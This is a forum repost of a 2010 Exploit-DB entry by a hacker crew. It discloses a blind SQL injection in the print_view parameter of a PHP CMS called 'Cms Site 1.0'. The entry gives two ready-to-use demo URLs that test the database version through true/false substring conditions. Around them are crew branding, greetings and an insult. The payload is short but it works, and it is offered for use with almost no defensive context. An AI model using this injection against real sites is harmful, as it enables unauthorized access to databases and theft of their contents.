- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 11063
- Проверка EDB
-
- Пройдено
- Автор
- RED-D3V1L
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- N/A
- Дата публикации
- 2010-01-08
Код:
+===================================================================================+
./SEC-R1Z _ __ _ _ _ _ ___ _ _ _ _ __ _ _ _ _ _
/ /_ _ _ _ / _ _\/ _ _ /\ \< |/_ _ _ _ /
\ \_ _ _ _/ /___ / / __ | |) / | | / /
\_ _ _ _/ /___ / / | __ || / | | / /
_______\ \_ _ \ \2_0_1_0 | \ | | / /____
/_ _ _ _ _\ _ _ _/\ _ _ _ / |__|\ __\ |__|/_ _ _ _ _\ R.I.P MichaelJackson !!!!!
+===================================================================================+
[?] ~ Note : sEc-r1z CrEw# r0x !
==============================================================================
[?] Cms Site 1.0 (print_view) Blind SQL Injection Vulnerability
==============================================================================
[?] My home: [ http://sec-r1z.com ]
[?] Script: [ Cms Site 1.0 ]
[?] Language: [ PHP ]
[?] Vendor [http://cuvsolutions.cu-village.com/]
[?] Founder: [ ./Red-D3v1L ]
[?] Gr44tz to: [ sec-r1z# Crew - Hackteach Team - My L0ve ~A~ ]
[?] Fuck To : [ Zombie_KsA << big big big L4m3r ]
########################################################################
===[ Exploit SQL Blind ]===
[»]Exploit : index.php?page_id=293&print_view=[ inject c0dE ]
[»]dem0:
http://server/index.php?page_id=293&print_view=y%20and%20substring%28@@version,1,1%29=4 << This True
http://server/index.php?page_id=293&print_view=y%20and%20substring%28@@version,1,1%29=5 << This Faulse
==============================================================================
#sEc-r1z.com Str1kEz y0u !
- Источник
- www.exploit-db.com